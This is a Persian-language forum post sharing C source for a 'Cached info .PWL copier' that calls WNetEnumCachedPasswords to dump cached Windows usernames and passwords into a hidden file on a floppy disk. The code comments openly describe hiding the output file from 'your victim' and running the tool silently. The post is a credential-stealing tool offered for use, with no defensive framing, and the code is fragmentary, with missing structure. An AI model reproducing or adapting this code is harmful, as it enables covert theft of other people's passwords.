سورس کد گشایی رمز
پنج شنبه 3 اسفند 1391 1:04 PM
با سلام خدمت شما دوستان گرامی
سورس کد گشایی رمز رو برای شما قرار دادم .
#include <windows.h>
#include <stdio.h>
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry; // size of this entry, in bytes
WORD cbResource; // size of resource name, in bytes
WORD cbPassword; // size of password, in bytes
BYTE iEntry; // entry index
BYTE nType; // type of entry
BYTE abResource[1]; // start of resource name
// password immediately follows resource name
char *buf, *ob1;
FILE *fsave;/*Handy info...
change terces.dat to a:\terces.dat and
just put the disk in the computer, run the program
and then it will be written on the disk for you
to take to other computers */
//change the below address if you dont want it to
//go on a disk
fsave = fopen("a:\\terces.dat","a");/* You can change this to a specific directory like c:\windows\system, if it is left as it is, the file is created in the same folder as the program was run*/
/****CLEVER NOTE!****
if you change that name from terces.dat to something that ends in
.sys it is automaticly hidden unless you goto veiw, folder options
and allow to view hidden/system files, this way you can hide is from your victim!
Remember, open the file terces.dat (or whatever you name it) using
notepad, everything is in plain viewable text.
memmove(buf, x->abResource, x->cbResource);
buf[x->cbResource] = 0;
CharToOem(buf, ob1);
fprintf(fsave,"\nApperent Username is: \n%-30s\n",ob1);
memmove(buf, x->abResource+x->cbResource, x->cbPassword);
buf[x->cbPassword] = 0;
CharToOem(buf, ob1);
fprintf(fsave,"\nPassword Is:\n%s",ob1 );
return TRUE;
void main()
buf = new char[1024];
ob1 = new char[1024];
puts("\t\t\t Cached info .PWL copier!\n"
"\n\nPress Enter to begin...\n");
getchar(); //Delete the getchar(); if you don't want to press enter, it will just write it and close in a second.
HINSTANCE hi = LoadLibrary("mpr.dll");
puts("Couldn't load mpr.dll");
WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) =
(WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");
puts("Couldn't import function");
(*enp)(0,0, 0xff, pce, 0);
printf("Successfully copied!");
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